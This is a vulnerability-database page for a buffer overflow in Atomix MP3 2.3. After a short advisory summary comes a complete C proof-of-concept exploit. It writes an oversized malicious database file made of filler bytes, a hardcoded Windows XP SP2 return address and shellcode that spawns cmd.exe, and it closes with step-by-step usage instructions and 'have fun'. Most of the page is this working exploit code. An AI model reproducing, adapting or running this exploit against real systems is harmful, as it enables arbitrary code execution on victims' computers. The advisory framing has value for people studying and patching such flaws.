Vulners
Lucene search
Atomix MP3 Malformed MP3 File Buffer Overflow Vulnerability
source: http://www.securityfocus.com/bid/23756/info
Atomix MP3 is prone to a buffer-overflow vulnerability because the application fails to bounds-check user-supplied data before copying it into an insufficiently sized buffer.
An attacker could exploit this issue by enticing a victim to load a malicious MP3 file. If successful, the attacker can execute arbitrary code in the context of the affected application.
////////////////////////////////// [ STARTING CODE ]
////////////////////////////////////////////////////
////
//// [ Explanation ] this probe of concept make
//// a malicious file that exploit the error.
////
////
//// [ Note ]
//// it was coded for Windows XP with SP2-es
//// if you want to try it into your own PC
//// it is necessary that you change this Offsets
//// for your own offsets.
////
//// on:
//// char offset[]="";
//// AND
//// mov ebx,0x77BF93C7
////
//// Enjoy it n_nU!..
//// Coded by preth00nker (using Mexican skill!)
#include <stdio.h>
#include <conio.h>
#include <string.h>
char shellcode[] = //A simple CMD Call =)
"\x55" //push ebp
"\x8B\xEC" //mov ebp,esp
"\x33\xFF" //xor edi,edi
"\x57" //push edi
"\xC6\x45\xFC\x63" //mov byte ptr [ebp-04h],63h
"\xC6\x45\xFD\x6D" //mov byte ptr [ebp-03h],6Dh
"\xC6\x45\xFE\x64" //mov byte ptr [ebp-02h],64h
"\x8D\x45\xFC" //lea eax,[ebp-04h]
"\x50" //push eax
"\xBB\xC7\x93\xBF\x77" //mov ebx,0x77BF93C7
"\xFF\xD3"; //call ebx
/*Evilbuffer - 520 Bytes Free4exploit*/
char evilbuffer[521] = "";
/*Data Base for songs found into the computer*/
char file[] = "mp3database.txt";
/*Call ESP SP2-es*/
char offset[] = "\x8B\x51\x81\x7C";
char temp[1024];
int main(){
printf("\n\n##################################################\n");
printf("######\n");
printf("###### Exploit Atomix 2.3\n");
printf("###### By Preth00nker\n");
printf("###### Preth00nker [at] gmail [dot] com\n");
printf("###### http://www.mexhackteam.org\n\n\n");
printf("###### http://www.prethoonker.tk\n\n\n");
FILE *fich;
memset(evilbuffer,'M',520);
fich=fopen(file,"w+");
printf(" (*) Creating the file: %s\n", file);
strcpy(temp,evilbuffer);
printf(" (*) Adding the evilbuffer\n");
strcat(temp,offset);
printf(" (*) Adding the Offset: %s\n", offset);
strcat(temp,shellcode);
printf(" (*) Adding the Sellcode\n");
fwrite(temp, strlen(temp),1, fich);
printf(" (*) Writting into the file\n");
printf(" [ Usage: ]\n");
printf("Step 1.- Generate the Evil File into the %ProgramFiles%\\AtomixMP3\\ \n");
printf("Step 2.- Run atomixmp3.exe\n");
printf("Step 3.- Click On Search module and Click (again) on the unique file found.\n");
printf("have fun =)!");
fclose(fich);
return 0;
}
////
////
////////////////////////////////////////// [ E O F ]
////////////////////////////////////////////////////
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1